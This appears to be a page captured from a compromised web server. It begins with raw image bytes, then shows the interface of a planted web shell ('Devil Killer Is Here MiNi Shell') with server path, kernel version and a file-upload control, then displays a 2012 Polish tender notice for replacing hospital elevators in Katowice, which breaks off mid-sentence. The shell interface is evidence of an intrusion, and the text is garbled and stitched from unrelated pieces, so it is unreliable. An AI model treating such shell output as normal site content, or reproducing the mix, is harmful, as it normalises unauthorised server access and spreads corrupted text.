JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/131089-N-2012.html

<p class="kh_header"><b>Katowice: Roboty budowlane w budynku
Specjalistycznego Szpitala Wieloprofilowego Etap I : Wymiana Wind.</b><br>
<b>Numer ogłoszenia: 131089 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny Nr 7 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Medyczne im. prof. Leszka Gieca , ul. Ziołowa 45/47, 40-635 Katowice, woj. śląskie, tel. 32 359 84 07, faks 32 202 95 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gcm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w budynku
Specjalistycznego Szpitala Wieloprofilowego Etap I : Wymiana Wind..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
zakup i wymiana dwóch wind osobowych w budynku Specjalistycznego Szpitala Wieloprofilowego w
Katowicach - Ochojcu , przy ul. Ziołowej 45/47. Docelowe przeznaczenie i sposób użytkowania obiektów
nie ulega zmianie w stosunku do stanu istniejącego Szczegółowy opis przedmiotu zamówienia zawierają
Załączniki 6 i 7 SIWZ Wymagania Zamawiającego dotyczące przedmiotu zamówienia: Przedmiot
zamówienia obejmuje następujący zakres robót : - demontaż istniejących i montaż nowych wind wraz z
oprzyrządowaniem, - roboty remontowe w zakresie maszynowni, - wykonanie instalacji elektrycznych
niezbędnych do podłączenia i oświetlenia wind w odniesieniu do : -windy W1 -windy W2 - maszynowni
wind W1-W2 -holu windowego w segmencie w rejonie wind W1 i W2 Zamawiający zastrzega , że wymiana
wind musi odbywać się w dwóch fazach ( nie ma możliwości jednoczesnego wyłączenia obu wind ) a. Faza
I : wyłączenie z eksploatacji windy nr 1 , wymiana windy nr 1 , uruchomienie windy nr 1 wraz z
przeprowadzeniem wszelkich procedur odbiorowych z UDT , dopuszczenie windy nr 1 do ruchu i
przekazanie jej Zamawiającemu b. Faza II: wyłączenie z eksploatacji windy nr 2 , wymiana windy nr 2 ,
uruchomienie windy nr 2 wraz z przeprowadzeniem wszelkich procedur odbiorowych z UDT , dopuszczenie
windy nr 2 do ruchu i przekazanie jej Zamawiającemu Przeprowadzenie wszelkich procedur odbiorowych z
jednostkami zewnętrznymi ( w szczególności Urzędem Dozoru Technicznego w zakresie badania
odbiorczego ( rejestracyjnego ) jest w zakresie Wykonawcy . Wykonawca zgłaszając gotowość do odbioru
jest zobowiązany uzyskać wszystkie wymagane uzgodnienia Urzędy Dozoru Technicznego dla zakresu
objętego przedmiotem umowy Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w
odniesieniu do pkt. 2 przedmiaru robót. Przez rozwiązania równoważne Zamawiający rozumie
zaoferowanie windy o parametrach : - nośność co najmniej 630 kg/8 osób - prędkość co najmniej 1,0 m,s -
segmenty ścian kabiny - blacha typu len- drzwi szybowe EL 60 dla 11 szt. drzwi.
Zakres modernizacji:
	wymiana istniejącego zespołu na zespół reduktorowy
	wymiana lin nośnych i linki ogranicznika prędkości
	wymiana ogranicznika prędkości na ogranicznik 2-kierunkowego działania	wymiana aparatury sterującej na aparaturę mikroprocesorową o zbiorczym sterowaniu w grupie 2 dźwigów
	wymiana kabiny na metalową z blachy nierdzewnej z oświetleniem diodowym w suficie, wentylatorem cichobieżnym, oświetleniem awaryjnym
	wymiana ramy kabiny na ramę w chwytacze dwukierunkowe
	montaż drzwi kabinowych automatycznych
	wymiana drzwi szybowych na automatyczne
	montaż bariery fotoelektrycznej
	wymiana kaset wezwań na piętrach z montażem piętrowskazywaczy (stal nierdzewna)
	modernizacja przeciwwagi i amortyzatorów w podszybiu
	pionowanie prowadnic kabinowych i przeciwwagowych
	malowanie szybu maszynowni
	obróbka i malowanie glifów  drzwi szybowych w obrębie 0,5m
	modernizacja pionu zasilającego dźwig od wyłącznika głównego 
	wymiana oświetlenia w szybie maszynowni
	wymiana progów na nierdzewne
	Wymiany kabiny: ok: 1100 x 1450 x 2150mm
	kabina:
	lustro na tylnej ścianie
	poręcz nierdzewna, okrągła
	ściany z blachy nierdzewnej len
	wentylator nad dachem
panel:
	awaryjne oświetlenie
	lampka przeciążenia 
	stacyjka pootrzymywania stanu otwartych drzwi
	intercom, system głośnomówiący, alarm
	drzwi  900 x 2000mm 
skrzydła, ościeżnica, progi ze stali nierdzewnej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6
Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.31.31.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium obejmujące cały
okres związania ofertą w wysokości: Wadium (zł) 4 800,00 zł W przypadku Wykonawców wspólnie
ubiegających się o udzielenie zamówienia, wadium może być wniesione przez dowolny podmiot
(podmioty). Z dokumentu wadialnego lub innego dokumentu załączonego do oferty powinno wynikać, w
imieniu jakiego Wykonawcy wadium jest wnoszone. 8.2. Wadium wnosi się przed upływem terminu
składania ofert. 8.3. Wadium może być wniesione w jednej lub kilku następujących formach: 1)pieniądzu; 2)
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że
poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych (nieodwołalnych,
bezwarunkowych, płatnych na pierwsze żądanie); 4) gwarancjach ubezpieczeniowych(nieodwołalnych,
bezwarunkowych, płatnych na pierwsze żądanie); 5) poręczeniach udzielanych przez podmioty, o których
mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505
oraz z 2010 r.Nr 96, poz. 620). Przed zawarciem umowy Wykonawca zobowiązany jest do wniesieniazabezpieczenia należytego wykonania umowy na sumę stanowiącą 10 % ceny całkowitej podanej w
ofercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje opisu sposobu dokonania oceny spełniania tego warunku, a
dokona oceny spełniania przez Wykonawcę tego warunku udziału w postępowaniu
stwierdzeniem: SPEŁNIA albo NIE SPEŁNIA w oparciu o oświadczenie o spełnianiu warunków
udziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, o
których mowa w art. 23 Pzp, muszą łącznie spełnić warunek wymieniony w art. 22 ust. 1 pkt 1
Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy na podstawie art. 22 ust. 1 Pzp
spełniają warunki dotyczące: posiadania wiedzy i doświadczenia, tj.: w okresie ostatnich 5 lat
przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie, wykonali co najmniej trzy roboty budowlane polegające na montażu dźwigów
osobowych lub towarowych , o łącznej wartości robót nie mniejszej niż 500 000,00 złotych brutto
W przypadku, gdy informacje te będą zawierały dane w walucie innej niż PLN, należy przyjąć
średni kurs NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie
Zamówień Publicznych; Zamawiający oceni spełnianie przez Wykonawcę warunku udziału w
postępowaniu stwierdzeniem: SPEŁNIA albo NIE SPEŁNIA, w oparciu o wymagane dokumenty
oraz oświadczenia i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie
zamówienia, o których mowa w art. 23 Pzp, muszą łącznie spełnić warunek wymieniony w art. 22
ust. 1 pkt 2Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje opisu sposobu dokonania oceny spełniania tego warunku, a
dokona oceny spełniania przez Wykonawcę tego warunku udziału w postępowaniu
stwierdzeniem: SPEŁNIA albo NIE SPEŁNIA w oparciu o oświadczenie o spełnianiu warunków
udziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, o
których mowa w art. 23 Pzp, muszą łącznie spełnić warunek wymieniony w art. 22 ust. 1 pkt 3Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje opisu sposobu dokonania oceny spełniania tego warunku, a
dokona oceny spełniania przez Wykonawcę tego warunku udziału w postępowaniu
stwierdzeniem: SPEŁNIA albo NIE SPEŁNIA w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, o których mowa w art. 23 Pzp, muszą łącznie spełnić warunek wymieniony w art. 22 ust. 1 pkt 3Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy na podstawie art. 22 ust. 1 Pzp
spełniają warunki dotyczące: sytuacji ekonomicznej i finansowej, tj. posiadają środki finansowe
lub zdolność kredytową w wysokości co najmniej 250 000,00 zł, W przypadku, gdy informacje te
będą zawierały dane w walucie innej niż PLN, należy przyjąć średni kurs NBP z dnia
zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych;
Zamawiający oceni spełnianie przez Wykonawcę warunku udziału w postępowaniu
stwierdzeniem: SPEŁNIA albo NIE SPEŁNIA w oparciu o wymagane dokumenty oraz
oświadczenia i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie
zamówienia, o których mowa w art. 23 Pzp, muszą łącznie spełnić warunek wymieniony w art. 22
ust. 1 pkt 4Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o braku podstaw do wykluczenia z postępowania - sporządzone wg wzoru stanowiącego
załącznik do SIWZ, - złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez
Wykonawcę; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten
składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w jego imieniu składa
go pełnomocnik tych Wykonawców; Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy
wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt
2 Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku doosób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 Pzp, sporządzone wg wzoru stanowiącego
załącznik do SIWZ, - złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez
Wykonawcę; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty te
składa każdy z tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem
przez Wykonawcę, którego dotyczą; Oświadczenie o spełnianiu warunków udziału w postępowaniu, o
których mowa w art. 22 ust. 1 Pzp, sporządzone wg wzoru stanowiącego załącznik do SIWZ, - złożone w
formie oryginału; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia
dokument ten składa pełnomocnik tych Wykonawców; Wykaz wykonanych robót budowlanych w zakresie
niezbędnym do wykazania spełnienia warunku dotyczącego wiedzy i doświadczenia, określonego w pkt
5.2.2) SIWZ, sporządzony wg wzoru stanowiącego załącznik do SIWZ, - złożony w formie oryginału lub
kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; W przypadku, gdy informacje te będą
zawierały dane w walucie innej niż PLN, należy przyjąć średni kurs NBP z dnia zamieszczenia ogłoszenia o
niniejszym zamówieniu w Biuletynie Zamówień Publicznych; W przypadku Wykonawców wspólnie
ubiegających się o udzielenie zamówienia dokument ten składa pełnomocnik tych Wykonawców;
Dokumenty potwierdzające, że wykazane roboty budowlane zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone, - złożone w formie oryginału lub kopii poświadczonej za zgodność z
oryginałem przez Wykonawcę; W przypadku Wykonawców wspólnie ubiegających się o udzielenie
zamówienia dokumenty te składają Wykonawcy, którzy potwierdzają spełnianie warunku w imieniu
Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w formie oryginału lub kopii
poświadczonej za zgodność z oryginałem przez Wykonawcę, którego dotyczą; Informację banku lub
spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek,
potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w
kwocie potwierdzającej spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej, określonego w
pkt 5.2.4. lit. a) SIWZ, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, -
złożoną w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; W
przypadku, gdy informacje te będą zawierały dane w walucie innej niż PLN, należy przyjąć średni kurs NBP
z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych W
przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty te składają
Wykonawcy, którzy potwierdzają spełnianie warunku w imieniu Wykonawców wspólnie ubiegających się o
udzielenie zamówienia, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez
Wykonawcę, którego dotyczą; Zobowiązanie(a) innych podmiotów do oddania do dyspozycji Wykonawcy
niezbędnych zasobów zakresie wiedzy i doświadczenia, oraz zdolności finansowej na okres korzystania z
nich przy wykonywaniu zamówienia (jeżeli Wykonawca polega na wiedzy i doświadczeniu, oraz
zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków),sporządzone wg wzoru stanowiącego załącznik do SIWZ, - złożone w formie oryginału przez
ten podmiot; W przypadku, gdy informacje te będą zawierały dane w walucie innej niż PLN, należy przyjąćśredni kurs NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień
Publicznych Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej w których podmiot(y)
oddający(e) do dyspozycji Wykonawcy swoje zasoby w zakresie zdolności finansowej posiada(ją)
rachunek, potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową tych
podmiotów w wysokości co najmniej oddawanego zasobu, wystawioną nie wcześniej niż 3 miesiące przed
upływem terminu składania ofert, - złożone w formie oryginału lub kopii poświadczonej za zgodność z
oryginałem przez ten podmiot; W przypadku, gdy informacje te będą zawierały dane w walucie innej niż
PLN, należy przyjąć średni kurs NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w
Biuletynie Zamówień Publicznych Formularz oferty o treści zgodnej ze wzorem stanowiącym załącznik do
SIWZ, - złożony w formie oryginału, W przypadku Wykonawców wspólnie ubiegających się o udzielenie
zamówienia dokument ten składa pełnomocnik tych Wykonawców; Pełnomocnictwo (jeśli dotyczy) -złożone
w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem; Kosztorys ofertowy
sporządzony na podstawie Przedmiaru robót - złożony w formie oryginału, W przypadku Wykonawców
wspólnie ubiegających się o udzielenie zamówienia dokument ten składa pełnomocnik tych Wykonawców;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do
treści oferty, na podstawie której dokonano wyboru wykonawcy: 1.1 przedłużenie terminu wykonania
zamówienia lub zmiana kolejności lub terminów wykonania poszczególnych etapów robót, w przypadku
zaistnienia co najmniej jednej z n/w okoliczności: a. wystąpienia konieczności udzielenia zamówienia
dodatkowego do zamówienia podstawowego stanowiącego przedmiot umowy, pod warunkiem
przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz
wyrażenia zgody przez Zamawiającego na tę zmianę. 1.2. zwiększenie wynagrodzenia Wykonawcy, a. w
przypadku ustawowej zmiany stawki podatku VAT, gdy istnieje obiektywna konieczność wprowadzenia
zmian, tj. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłobyWykonawcy rażącą stratą w rozumieniu art. 3571 kodeksu cywilnego oraz zmiana wynika z okoliczności,
których nie można było przewidzieć w momencie zawarcia umowy, pod warunkiem przedłożenia
Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez
Zamawiającego na tę zmianę; 1.3 zmiana sposobu lub terminu płatności a. w przypadku gdy konieczność
takiej zmiany wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy lub
zmiana ta jest korzystna dla Zamawiającego, pod warunkiem przedłożenia Zamawiającemu pisemnego
uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę
zmianę; 2. Wszystkie postanowienia zawarte w ust. 1 stanowią katalog zmian postanowień umowy, na
które Zamawiający może wyrazić zgodę i nie stanowią jednocześnie zobowiązania Zamawiającego do
wyrażenia takiej zgody. 3. Nie stanowią zmian umowy w rozumieniu art. 144 ustawy Prawo zamówień
publicznych zmiany spowodowane przyczynami organizacyjnymi, a w szczególności: - zmiana numeru
